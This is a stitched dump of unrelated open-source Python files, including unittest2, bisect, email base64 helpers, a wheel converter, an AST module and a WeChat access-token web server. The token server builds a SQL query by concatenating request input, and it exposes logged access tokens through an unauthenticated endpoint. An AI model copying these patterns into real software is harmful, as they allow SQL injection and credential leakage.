Application.getInstance().getApplicationName() + ".cfg")) self._saving = False
agpl-3.0
pec1985/titanium_mobile
drillbit/sdk_tests/unittest2/__init__.py
155
2406
""" unittest2 unittest2 is a backport of the new features added to the unittest testing framework in Python 2.7. It is tested to run on Python 2.4 - 2.6. To use unittest2 instead of unittest simply replace ``import unittest`` with ``import unittest2``. Copyright (c) 1999-2003 Steve Purcell Copyright (c) 2003-2010 Python Software Foundation This module is free software, and you may redistribute it and/or modify it under the same terms as Python itself, so long as this copyright message and disclaimer are retained in their original form. IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS, AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS. """ __all__ = ['TestResult', 'TestCase', 'TestSuite', 'TextTestRunner', 'TestLoader', 'FunctionTestCase', 'main', 'defaultTestLoader', 'SkipTest', 'skip', 'skipIf', 'skipUnless', 'expectedFailure', 'TextTestResult', '__version__', 'collector'] __version__ = '0.5.1' # Expose obsolete functions for backwards compatibility __all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases']) from unittest2.collector import collector from unittest2.result import TestResult from unittest2.case import ( TestCase, FunctionTestCase, SkipTest, skip, skipIf, skipUnless, expectedFailure ) from unittest2.suite import BaseTestSuite, TestSuite from unittest2.loader import ( TestLoader, defaultTestLoader, makeSuite, getTestCaseNames, findTestCases ) from unittest2.main import TestProgram, main, main_ from unittest2.runner import TextTestRunner, TextTestResult try: from unittest2.signals import ( installHandler, registerResult, removeResult, removeHandler ) except ImportError: # Compatibility with platforms that don't have the signal module pass else: __all__.extend(['installHandler', 'registerResult', 'removeResult', 'removeHandler']) # deprecated _TextTestResult = TextTestResult __unittest = True
apache-2.0
linked67/p2pool-lire
p2pool/util/fixargparse.py
283
1630
from __future__ import absolute_import import argparse import sys class FixedArgumentParser(argparse.ArgumentParser): ''' fixes argparse's handling of empty string arguments and changes @filename behaviour to accept multiple arguments on each line ''' def _read_args_from_files(self, arg_strings): # expand arguments referencing files new_arg_strings = [] for arg_string in arg_strings: # for regular arguments, just add them back into the list if not arg_string or arg_string[0] not in self.fromfile_prefix_chars: new_arg_strings.append(arg_string) # replace arguments referencing files with the file content else: try: args_file = open(arg_string[1:]) try: arg_strings = [] for arg_line in args_file.read().splitlines(): for arg in self.convert_arg_line_to_args(arg_line): arg_strings.append(arg) arg_strings = self._read_args_from_files(arg_strings) new_arg_strings.extend(arg_strings) finally: args_file.close() except IOError: err = sys.exc_info()[1] self.error(str(err)) # return the modified argument list return new_arg_strings def convert_arg_line_to_args(self, arg_line): return [arg for arg in arg_line.split() if arg.strip()]
gpl-3.0
40223219/2015_midterm
static/Brython3.1.1-20150328-091302/Lib/bisect.py
1261
2595
"""Bisection algorithms.""" def insort_right(a, x, lo=0, hi=None): """Insert item x in list a, and keep it sorted assuming a is sorted. If x is already in a, insert it to the right of the rightmost x. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if x < a[mid]: hi = mid else: lo = mid+1 a.insert(lo, x) insort = insort_right # backward compatibility def bisect_right(a, x, lo=0, hi=None): """Return the index where to insert item x in list a, assuming a is sorted. The return value i is such that all e in a[:i] have e <= x, and all e in a[i:] have e > x. So if x already appears in the list, a.insert(x) will insert just after the rightmost x already there. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if x < a[mid]: hi = mid else: lo = mid+1 return lo bisect = bisect_right # backward compatibility def insort_left(a, x, lo=0, hi=None): """Insert item x in list a, and keep it sorted assuming a is sorted. If x is already in a, insert it to the left of the leftmost x. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if a[mid] < x: lo = mid+1 else: hi = mid a.insert(lo, x) def bisect_left(a, x, lo=0, hi=None): """Return the index where to insert item x in list a, assuming a is sorted. The return value i is such that all e in a[:i] have e < x, and all e in a[i:] have e >= x. So if x already appears in the list, a.insert(x) will insert just before the leftmost x already there. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if a[mid] < x: lo = mid+1 else: hi = mid return lo # Overwrite above definitions with a fast C implementation try: from _bisect import * except ImportError: pass
gpl-3.0
alphafoobar/intellij-community
python/lib/Lib/email/base64MIME.py
93
5802
# Copyright (C) 2002-2006 Python Software Foundation # Author: Ben Gertzfield # Contact: email-sig@python.org """Base64 content transfer encoding per RFCs 2045-2047. This module handles the content transfer encoding method defined in RFC 2045 to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit characters encoding known as Base64. It is used in the MIME standards for email to attach images, audio, and text using some 8-bit character sets to messages. This module provides an interface to encode and decode both headers and bodies with Base64 encoding. RFC 2045 defines a method for including character set information in an `encoded-word' in a header. This method is commonly used for 8-bit real names in To:, From:, Cc:, etc. fields, as well as Subject: lines. This module does not do the line wrapping or end-of-line character conversion necessary for proper internationalized headers; it only does dumb encoding and decoding. To deal with the various line wrapping issues, use the email.Header module. """ __all__ = [ 'base64_len', 'body_decode', 'body_encode', 'decode', 'decodestring', 'encode', 'encodestring', 'header_encode', ] import re from binascii import b2a_base64, a2b_base64 from email.utils import fix_eols CRLF = '\r\n' NL = '\n' EMPTYSTRING = '' # See also Charset.py MISC_LEN = 7 # Helpers def base64_len(s): """Return the length of s when it is encoded with base64.""" groups_of_3, leftover = divmod(len(s), 3) # 4 bytes out for each 3 bytes (or nonzero fraction thereof) in. # Thanks, Tim! n = groups_of_3 * 4 if leftover: n += 4 return n def header_encode(header, charset='iso-8859-1', keep_eols=False, maxlinelen=76, eol=NL): """Encode a single header line with Base64 encoding in a given charset. Defined in RFC 2045, this Base64 encoding is identical to normal Base64 encoding, except that each line must be intelligently wrapped (respecting the Base64 encoding), and subsequent lines must start with a space. charset names the character set to use to encode the header. It defaults to iso-8859-1. End-of-line characters (\\r, \\n, \\r\\n) will be automatically converted to the canonical email line separator \\r\\n unless the keep_eols parameter is True (the default is False). Each line of the header will be terminated in the value of eol, which defaults to "\\n". Set this to "\\r\\n" if you are using the result of this function directly in email. The resulting string will be in the form: "=?charset?b?WW/5ciBtYXp66XLrIHf8eiBhIGhhbXBzdGHuciBBIFlv+XIgbWF6euly?=\\n =?charset?b?6yB3/HogYSBoYW1wc3Rh7nIgQkMgWW/5ciBtYXp66XLrIHf8eiBhIGhh?=" with each line wrapped at, at most, maxlinelen characters (defaults to 76 characters). """ # Return empty headers unchanged if not header: return header if not keep_eols: header = fix_eols(header) # Base64 encode each line, in encoded chunks no greater than maxlinelen in # length, after the RFC chrome is added in. base64ed = [] max_encoded = maxlinelen - len(charset) - MISC_LEN max_unencoded = max_encoded * 3 // 4 for i in range(0, len(header), max_unencoded): base64ed.append(b2a_base64(header[i:i+max_unencoded])) # Now add the RFC chrome to each encoded chunk lines = [] for line in base64ed: # Ignore the last character of each line if it is a newline if line.endswith(NL): line = line[:-1] # Add the chrome lines.append('=?%s?b?%s?=' % (charset, line)) # Glue the lines together and return it. BAW: should we be able to # specify the leading whitespace in the joiner? joiner = eol + ' ' return joiner.join(lines) def encode(s, binary=True, maxlinelen=76, eol=NL): """Encode a string with base64. Each line will be wrapped at, at most, maxlinelen characters (defaults to 76 characters). If binary is False, end-of-line characters will be converted to the canonical email end-of-line sequence \\r\\n. Otherwise they will be left verbatim (this is the default). Each line of encoded text will end with eol, which defaults to "\\n". Set this to "\r\n" if you will be using the result of this function directly in an email. """ if not s: return s if not binary: s = fix_eols(s) encvec = [] max_unencoded = maxlinelen * 3 // 4 for i in range(0, len(s), max_unencoded): # BAW: should encode() inherit b2a_base64()'s dubious behavior in # adding a newline to the encoded string? enc = b2a_base64(s[i:i + max_unencoded]) if enc.endswith(NL) and eol <> NL: enc = enc[:-1] + eol encvec.append(enc) return EMPTYSTRING.join(encvec) # For convenience and backwards compatibility w/ standard base64 module body_encode = encode encodestring = encode def decode(s, convert_eols=None): """Decode a raw base64 string. If convert_eols is set to a string value, all canonical email linefeeds, e.g. "\\r\\n", in the decoded text will be converted to the value of convert_eols. os.linesep is a good choice for convert_eols if you are decoding a text attachment. This function does not parse a full MIME header value encoded with base64 (like =?iso-8895-1?b?bmloISBuaWgh?=) -- please use the high level email.Header class for that functionality. """ if not s: return s dec = a2b_base64(s) if convert_eols: return dec.replace(CRLF, convert_eols) return dec # For convenience and backwards compatibility w/ standard base64 module body_decode = decode decodestring = decode
apache-2.0
mdworks2016/work_development
Python/20_Third_Certification/venv/lib/python3.7/site-packages/wheel/cli/convert.py
10
9498
import os.path import re import shutil import sys import tempfile import zipfile from distutils import dist from glob import iglob from ..bdist_wheel import bdist_wheel from ..wheelfile import WheelFile from . import WheelError, require_pkgresources egg_info_re = re.compile(r''' (?P<name>.+?)-(?P<ver>.+?) (-(?P<pyver>py\d\.\d+) (-(?P<arch>.+?))? )?.egg$''', re.VERBOSE) class _bdist_wheel_tag(bdist_wheel): # allow the client to override the default generated wheel tag # The default bdist_wheel implementation uses python and abi tags # of the running python process. This is not suitable for # generating/repackaging prebuild binaries. full_tag_supplied = False full_tag = None # None or a (pytag, soabitag, plattag) triple def get_tag(self): if self.full_tag_supplied and self.full_tag is not None: return self.full_tag else: return bdist_wheel.get_tag(self) def egg2wheel(egg_path, dest_dir): filename = os.path.basename(egg_path) match = egg_info_re.match(filename) if not match: raise WheelError('Invalid egg file name: {}'.format(filename)) egg_info = match.groupdict() dir = tempfile.mkdtemp(suffix="_e2w") if os.path.isfile(egg_path): # assume we have a bdist_egg otherwise with zipfile.ZipFile(egg_path) as egg: egg.extractall(dir) else: # support buildout-style installed eggs directories for pth in os.listdir(egg_path): src = os.path.join(egg_path, pth) if os.path.isfile(src): shutil.copy2(src, dir) else: shutil.copytree(src, os.path.join(dir, pth)) pyver = egg_info['pyver'] if pyver: pyver = egg_info['pyver'] = pyver.replace('.', '') arch = (egg_info['arch'] or 'any').replace('.', '_').replace('-', '_') # assume all binary eggs are for CPython abi = 'cp' + pyver[2:] if arch != 'any' else 'none' root_is_purelib = egg_info['arch'] is None if root_is_purelib: bw = bdist_wheel(dist.Distribution()) else: bw = _bdist_wheel_tag(dist.Distribution()) bw.root_is_pure = root_is_purelib bw.python_tag = pyver bw.plat_name_supplied = True bw.plat_name = egg_info['arch'] or 'any' if not root_is_purelib: bw.full_tag_supplied = True bw.full_tag = (pyver, abi, arch) dist_info_dir = os.path.join(dir, '{name}-{ver}.dist-info'.format(**egg_info)) bw.egg2dist(os.path.join(dir, 'EGG-INFO'), dist_info_dir) bw.write_wheelfile(dist_info_dir, generator='egg2wheel') wheel_name = '{name}-{ver}-{pyver}-{}-{}.whl'.format(abi, arch, **egg_info) with WheelFile(os.path.join(dest_dir, wheel_name), 'w') as wf: wf.write_files(dir) shutil.rmtree(dir) def parse_wininst_info(wininfo_name, egginfo_name): """Extract metadata from filenames. Extracts the 4 metadataitems needed (name, version, pyversion, arch) from the installer filename and the name of the egg-info directory embedded in the zipfile (if any). The egginfo filename has the format:: name-ver(-pyver)(-arch).egg-info The installer filename has the format:: name-ver.arch(-pyver).exe Some things to note: 1. The installer filename is not definitive. An installer can be renamed and work perfectly well as an installer. So more reliable data should be used whenever possible. 2. The egg-info data should be preferred for the name and version, because these come straight from the distutils metadata, and are mandatory. 3. The pyver from the egg-info data should be ignored, as it is constructed from the version of Python used to build the installer, which is irrelevant - the installer filename is correct here (even to the point that when it's not there, any version is implied). 4. The architecture must be taken from the installer filename, as it is not included in the egg-info data. 5. Architecture-neutral installers still have an architecture because the installer format itself (being executable) is architecture-specific. We should therefore ignore the architecture if the content is pure-python. """ egginfo = None if egginfo_name: egginfo = egg_info_re.search(egginfo_name) if not egginfo: raise ValueError("Egg info filename %s is not valid" % (egginfo_name,)) # Parse the wininst filename # 1. Distribution name (up to the first '-') w_name, sep, rest = wininfo_name.partition('-') if not sep: raise ValueError("Installer filename %s is not valid" % (wininfo_name,)) # Strip '.exe' rest = rest[:-4] # 2. Python version (from the last '-', must start with 'py') rest2, sep, w_pyver = rest.rpartition('-') if sep and w_pyver.startswith('py'): rest = rest2 w_pyver = w_pyver.replace('.', '') else: # Not version specific - use py2.py3. While it is possible that # pure-Python code is not compatible with both Python 2 and 3, there # is no way of knowing from the wininst format, so we assume the best # here (the user can always manually rename the wheel to be more # restrictive if needed). w_pyver = 'py2.py3' # 3. Version and architecture w_ver, sep, w_arch = rest.rpartition('.') if not sep: raise ValueError("Installer filename %s is not valid" % (wininfo_name,)) if egginfo: w_name = egginfo.group('name') w_ver = egginfo.group('ver') return {'name': w_name, 'ver': w_ver, 'arch': w_arch, 'pyver': w_pyver} def wininst2wheel(path, dest_dir): with zipfile.ZipFile(path) as bdw: # Search for egg-info in the archive egginfo_name = None for filename in bdw.namelist(): if '.egg-info' in filename: egginfo_name = filename break info = parse_wininst_info(os.path.basename(path), egginfo_name) root_is_purelib = True for zipinfo in bdw.infolist(): if zipinfo.filename.startswith('PLATLIB'): root_is_purelib = False break if root_is_purelib: paths = {'purelib': ''} else: paths = {'platlib': ''} dist_info = "%(name)s-%(ver)s" % info datadir = "%s.data/" % dist_info # rewrite paths to trick ZipFile into extracting an egg # XXX grab wininst .ini - between .exe, padding, and first zip file. members = [] egginfo_name = '' for zipinfo in bdw.infolist(): key, basename = zipinfo.filename.split('/', 1) key = key.lower() basepath = paths.get(key, None) if basepath is None: basepath = datadir + key.lower() + '/' oldname = zipinfo.filename newname = basepath + basename zipinfo.filename = newname del bdw.NameToInfo[oldname] bdw.NameToInfo[newname] = zipinfo # Collect member names, but omit '' (from an entry like "PLATLIB/" if newname: members.append(newname) # Remember egg-info name for the egg2dist call below if not egginfo_name: if newname.endswith('.egg-info'): egginfo_name = newname elif '.egg-info/' in newname: egginfo_name, sep, _ = newname.rpartition('/') dir = tempfile.mkdtemp(suffix="_b2w") bdw.extractall(dir, members) # egg2wheel abi = 'none' pyver = info['pyver'] arch = (info['arch'] or 'any').replace('.', '_').replace('-', '_') # Wininst installers always have arch even if they are not # architecture-specific (because the format itself is). # So, assume the content is architecture-neutral if root is purelib. if root_is_purelib: arch = 'any' # If the installer is architecture-specific, it's almost certainly also # CPython-specific. if arch != 'any': pyver = pyver.replace('py', 'cp') wheel_name = '-'.join((dist_info, pyver, abi, arch)) if root_is_purelib: bw = bdist_wheel(dist.Distribution()) else: bw = _bdist_wheel_tag(dist.Distribution()) bw.root_is_pure = root_is_purelib bw.python_tag = pyver bw.plat_name_supplied = True bw.plat_name = info['arch'] or 'any' if not root_is_purelib: bw.full_tag_supplied = True bw.full_tag = (pyver, abi, arch) dist_info_dir = os.path.join(dir, '%s.dist-info' % dist_info) bw.egg2dist(os.path.join(dir, egginfo_name), dist_info_dir) bw.write_wheelfile(dist_info_dir, generator='wininst2wheel') wheel_path = os.path.join(dest_dir, wheel_name) with WheelFile(wheel_path, 'w') as wf: wf.write_files(dir) shutil.rmtree(dir) def convert(files, dest_dir, verbose): # Only support wheel convert if pkg_resources is present require_pkgresources('wheel convert') for pat in files: for installer in iglob(pat): if os.path.splitext(installer)[1] == '.egg': conv = egg2wheel else: conv = wininst2wheel if verbose: print("{}... ".format(installer)) sys.stdout.flush() conv(installer, dest_dir) if verbose: print("OK")
apache-2.0
William-An/wechat_server
Control_server/accesskey_Server.py
1
5638
import requests import sqlite3 import web import time import os import sys # 加密?-> 出租服务器 """ Using two server to provide wechat subscription service, one for acquring token, one for processing request """ PATH = os.path.abspath(os.path.dirname(sys.argv[0])) # The path of this file timer=os.times() web.config.debug = False # Set true to open debug output accesskey_url = "https://api.weixin.qq.com/cgi-bin/token" urls=( "/access_token", "token_acquirer", "/log", "log_replyier" ) database = sqlite3.connect(PATH+r"\..\Static\appid.db") # Initializing database #database_dir = PATH+r"\..\Static\appid.db" #database = web.database(dbn="sqlite",db=database_dir) # Create table to store tokens try: database.execute('''CREATE TABLE appid_token(appid text, current_token text, last_time real)''') except: del database class token_acquirer: db=None def __init__(self): """ Log server's initialization Store debug log """ # Initialize database # Class attribute? token_acquirer.db = web.database(dbn="sqlite",db=PATH+r"\..\Static\appid.db") self.last_time = 0 msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\tProcessing request..." print(msg) with open(PATH+r"\..\Static\log","a") as log: log.writelines(msg) log.write("\n") log.flush() log.close() def GET(self): # What about multi reuse??? 多个服务器请求时怎么办 -> SQL # print(web.ctx.ip) credential = dict(web.input()) # print(credential["appid"]) # Get elapse time to calculate expire_time -> time.time() store last record in sql, calculate with this request # SELECT expire_time FROM appid_token WHERE appid = try: # Using db.query to process regular sql code self.last_time = token_acquirer.db.query("SELECT last_time FROM appid_token WHERE appid = $appid",vars= {"appid":credential["appid"]})["last_time"] # print(self.last_time) except: # New appid? # INSERT INTO appid_token VALUES(appid, current_token, last_time) token_acquirer.db.query("INSERT INTO appid_token VALUES($appid,$current_token,$last_time)",vars={"appid":credential["appid"],"current_token":"", "last_time":self.last_time}) # print(token_acquirer.db.select('appid_token')[0]) # Simplify this if clause? if time.time() - self.last_time > 7180: # If access_token is nearly invalid self.token = self.get_token(credential) print(self.token) if "ERROR" in self.token: return self.token # Update token and time # UPDATE appid_token SET current_token = , expire_time = WHERE appid = # print(token_acquirer.db.select('appid_token')[0]) token_acquirer.db.query("UPDATE appid_token SET current_token =$current_token , last_time= $last_time WHERE appid = $appid",vars={"appid":credential["appid"],"current_token":self.token, "last_time":time.time()}) # print(token_acquirer.db.select('appid_token')[0]) return self.token else: # find token in sql return token_acquirer.db.select('appid_token',id,what="current_token",where="appid = "+credential["appid"])["current_token"] def get_token(self,credential): with open(PATH+r"\..\Static\log","a") as log: for i in range(5): # Try 5 times try: key = requests.get(accesskey_url,params=credential).json() except Exception as err: # Change to use string format: "%",var msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\t[-] ID:"+credential["appid"]+"\tError in get:"+str(err)#+"\t Usually inapporpriate GET input" # Write a function? log.writelines(msg+"\n") log.flush() print(msg) #time.sleep(1) continue if "errcode" in key: msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\t[-] ID:"+credential["appid"]+"\tUnable to acquire access_token:"+str(key["errcode"])+"\t"+key["errmsg"] log.writelines(msg+"\n") log.flush() print(msg) #time.sleep(1) continue # Send email? msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\t[+] ID:"+credential["appid"]+"\ttoken:"+str(key["access_token"]) log.writelines(msg+"\n") log.flush() # Save output print(msg) log.close() return key["access_token"]#, key["expires_in"] else: print(msg) log.close() return "ERROR:"+msg#,0 # Read the last 5 lines and print class log_replyier(): # Adding authentication? APP secret? log_dir = PATH+r"\..\Static\log" #def __init__(self): def GET(self): try: request_appid = dict(web.input())["appid"] return log_replyier.log_finder(request_appid) # Have to use position vars? except Exception as err: return str(err) @staticmethod def log_finder(appid): with open(log_replyier.log_dir,"r") as log_file: msg = "".join([i for i in log_file.readlines() if appid in i ]) print(msg) return msg if __name__ == "__main__": app = web.application(urls,globals()) app.run()
apache-2.0
tajkhan/pluto-pocc
annotations/module/loop/ast.py
4
20819
# # The classes of the abstract syntax tree # # AST # | # +-- Exp # | | # | +-- NumLitExp # | +-- StringLitExp # | +-- IdentExp # | +-- ArrayRefExp # | +-- FunCallExp # | +-- UnaryExp # | +-- BinOpExp # | +-- ParenthExp # | # +-- Stmt # | | # | +-- ExpStmt # | +-- CompStmt # | +-- IfStmt # | +-- ForStmt # | +-- TransformStmt # | # +-- NewAST # | # +-- VarDecl # # - The NewAST is used to denote ASTs that are used only in the output code generation. # - UnaryExp.AND never appears in the input code. It is used in the output code generation only. # import sys #----------------------------------------------- # AST - the base class #----------------------------------------------- class AST: def __init__(self, line_no = ''): '''Create an abstract syntax tree node''' self.line_no = line_no # may be null def replicate(self): '''Replicate this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "replicate" not implemented' % self.__class__.__name__) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "__repr__" not implemented' % self.__class__.__name__) def __str__(self): '''Return a string representation of this abstract syntax tree node''' return repr(self) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "unparseToC" not implemented' % self.__class__.__name__) def unparseToFortran(self, indent, extra_indent): '''Generate Fortran code from this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "unparseToFortran" not implemented' % self.__class__.__name__) #----------------------------------------------- # Expression #----------------------------------------------- class Exp(AST): def __init__(self, line_no = ''): '''Create an expression''' AST.__init__(self, line_no) #----------------------------------------------- # Number Literal #----------------------------------------------- class NumLitExp(Exp): INT = 1 FLOAT = 2 def __init__(self, val, lit_type, line_no = ''): '''Create a numeric literal''' Exp.__init__(self, line_no) self.val = val self.lit_type = lit_type def replicate(self): '''Replicate this abstract syntax tree node''' return NumLitExp(self.val, self.lit_type, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.val) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return str(self.val) #----------------------------------------------- # String Literal #----------------------------------------------- class StringLitExp(Exp): def __init__(self, val, line_no = ''): '''Create a string literal''' Exp.__init__(self, line_no) self.val = val def replicate(self): '''Replicate this abstract syntax tree node''' return StringLitExp(self.val, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.val) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return str(self.val) #----------------------------------------------- # Identifier #----------------------------------------------- class IdentExp(Exp): def __init__(self, name, line_no = ''): '''Create an identifier''' Exp.__init__(self, line_no) self.name = name def replicate(self): '''Replicate this abstract syntax tree node''' return IdentExp(self.name, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.name) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return str(self.name) #----------------------------------------------- # Array Reference #----------------------------------------------- class ArrayRefExp(Exp): def __init__(self, exp, sub_exp, line_no = ''): '''Create an array reference''' Exp.__init__(self, line_no) self.exp = exp self.sub_exp = sub_exp def replicate(self): '''Replicate this abstract syntax tree node''' return ArrayRefExp(self.exp.replicate(), self.sub_exp.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.exp) + '[' + str(self.sub_exp) + ']' def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = '' s += self.exp.unparseToC(indent, extra_indent) + '[' s += self.sub_exp.unparseToC(indent, extra_indent) + ']' return s #----------------------------------------------- # Function Call #----------------------------------------------- class FunCallExp(Exp): def __init__(self, exp, args, line_no = ''): '''Create a function call''' Exp.__init__(self, line_no) self.exp = exp self.args = args def replicate(self): '''Replicate this abstract syntax tree node''' return FunCallExp(self.exp.replicate(), [a.replicate() for a in self.args], self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = str(self.exp) + '(' s += ', '.join(map(str, self.args)) s += ')' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = self.exp.unparseToC(indent, extra_indent) + '(' s += ', '.join(map(lambda x: x.unparseToC(indent, extra_indent), self.args)) s += ')' return s #----------------------------------------------- # Unary Expression #----------------------------------------------- class UnaryExp(Exp): PLUS = 1 MINUS = 2 LNOT = 3 PRE_INC = 4 PRE_DEC = 5 POST_INC = 6 POST_DEC = 7 AND = 8 def __init__(self, exp, op_type, line_no = ''): '''Create a unary operation expression''' Exp.__init__(self, line_no) self.exp = exp self.op_type = op_type def replicate(self): '''Replicate this abstract syntax tree node''' return UnaryExp(self.exp.replicate(), self.op_type, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = str(self.exp) if self.op_type == UnaryExp.PLUS: s = '+' + s elif self.op_type == UnaryExp.MINUS: s = '-' + s elif self.op_type == UnaryExp.LNOT: s = '!' + s elif self.op_type == UnaryExp.PRE_INC: s = '++' + s elif self.op_type == UnaryExp.PRE_DEC: s = '--' + s elif self.op_type == UnaryExp.POST_INC: s = s + '++' elif self.op_type == UnaryExp.POST_DEC: s = s + '--' elif self.op_type == UnaryExp.AND: s = '&' + s else: print 'internal error: unknown unary operator type' sys.exit(1) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = self.exp.unparseToC(indent, extra_indent) if self.op_type == UnaryExp.PLUS: s = '+' + s elif self.op_type == UnaryExp.MINUS: s = '-' + s elif self.op_type == UnaryExp.LNOT: s = '!' + s elif self.op_type == UnaryExp.PRE_INC: s = '++' + s elif self.op_type == UnaryExp.PRE_DEC: s = '--' + s elif self.op_type == UnaryExp.POST_INC: s = s + '++' elif self.op_type == UnaryExp.POST_DEC: s = s + '--' elif self.op_type == UnaryExp.AND: s = '&' + s else: print 'internal error: unknown unary operator type' sys.exit(1) return s #----------------------------------------------- # Binary Operation #----------------------------------------------- class BinOpExp(Exp): MUL = 1 DIV = 2 MOD = 3 ADD = 4 SUB = 5 LT = 6 GT = 7 LE = 8 GE = 9 EQ = 10 NE = 11 LOR = 12 LAND = 13 COMMA = 14 EQ_ASGN = 15 def __init__(self, lhs, rhs, op_type, line_no = ''): '''Create a binary operation expression''' Exp.__init__(self, line_no) self.lhs = lhs self.rhs = rhs self.op_type = op_type def replicate(self): '''Replicate this abstract syntax tree node''' return BinOpExp(self.lhs.replicate(), self.rhs.replicate(), self.op_type, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = str(self.lhs) if (self.op_type == BinOpExp.MUL): s += ' * ' elif (self.op_type == BinOpExp.DIV): s += ' / ' elif (self.op_type == BinOpExp.MOD): s += ' % ' elif (self.op_type == BinOpExp.ADD): s += ' + ' elif (self.op_type == BinOpExp.SUB): s += ' - ' elif (self.op_type == BinOpExp.LT): s += ' < ' elif (self.op_type == BinOpExp.GT): s += ' > ' elif (self.op_type == BinOpExp.LE): s += ' <= ' elif (self.op_type == BinOpExp.GE): s += ' >= ' elif (self.op_type == BinOpExp.EQ): s += ' == ' elif (self.op_type == BinOpExp.NE): s += ' != ' elif (self.op_type == BinOpExp.LOR): s += ' || ' elif (self.op_type == BinOpExp.LAND): s += ' && ' elif (self.op_type == BinOpExp.COMMA): s += ' , ' elif (self.op_type == BinOpExp.EQ_ASGN): s += ' = ' else: print 'internal error: unknown bin-op operator type' sys.exit(1) s += str(self.rhs) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = self.lhs.unparseToC(indent, extra_indent) if (self.op_type == BinOpExp.MUL): s += ' * ' elif (self.op_type == BinOpExp.DIV): s += ' / ' elif (self.op_type == BinOpExp.MOD): s += ' % ' elif (self.op_type == BinOpExp.ADD): s += ' + ' elif (self.op_type == BinOpExp.SUB): s += ' - ' elif (self.op_type == BinOpExp.LT): s += ' < ' elif (self.op_type == BinOpExp.GT): s += ' > ' elif (self.op_type == BinOpExp.LE): s += ' <= ' elif (self.op_type == BinOpExp.GE): s += ' >= ' elif (self.op_type == BinOpExp.EQ): s += ' == ' elif (self.op_type == BinOpExp.NE): s += ' != ' elif (self.op_type == BinOpExp.LOR): s += ' || ' elif (self.op_type == BinOpExp.LAND): s += ' && ' elif (self.op_type == BinOpExp.COMMA): s += ' , ' elif (self.op_type == BinOpExp.EQ_ASGN): s += ' = ' else: print 'internal error: unknown bin-op operator type' sys.exit(1) s += self.rhs.unparseToC(indent, extra_indent) return s #----------------------------------------------- # Parenthesized Expression #----------------------------------------------- class ParenthExp(Exp): def __init__(self, exp, line_no = ''): '''Create a parenthesized expression''' Exp.__init__(self, line_no) self.exp = exp def replicate(self): '''Replicate this abstract syntax tree node''' return ParenthExp(self.exp.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return '(' + str(self.exp) + ')' def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return '(' + self.exp.unparseToC(indent, extra_indent) + ')' #----------------------------------------------- # Statement #----------------------------------------------- class Stmt(AST): def __init__(self, line_no = ''): '''Create a statement''' AST.__init__(self, line_no) #----------------------------------------------- # Expression Statement #----------------------------------------------- class ExpStmt(Stmt): def __init__(self, exp, line_no = ''): '''Create an expression statement''' Stmt.__init__(self, line_no) self.exp = exp # may be null def replicate(self): '''Replicate this abstract syntax tree node''' r_e = self.exp if r_e != None: r_e = r_e.replicate() return ExpStmt(r_e, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = '' if self.exp != None: s += str(self.exp) s += '; ' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = indent if self.exp != None: s += self.exp.unparseToC(indent, extra_indent) s += '; \n' return s #----------------------------------------------- # Compound Statement #----------------------------------------------- class CompStmt(Stmt): def __init__(self, stmts, line_no = ''): '''Create a compound statement''' Stmt.__init__(self, line_no) self.stmts = stmts def replicate(self): '''Replicate this 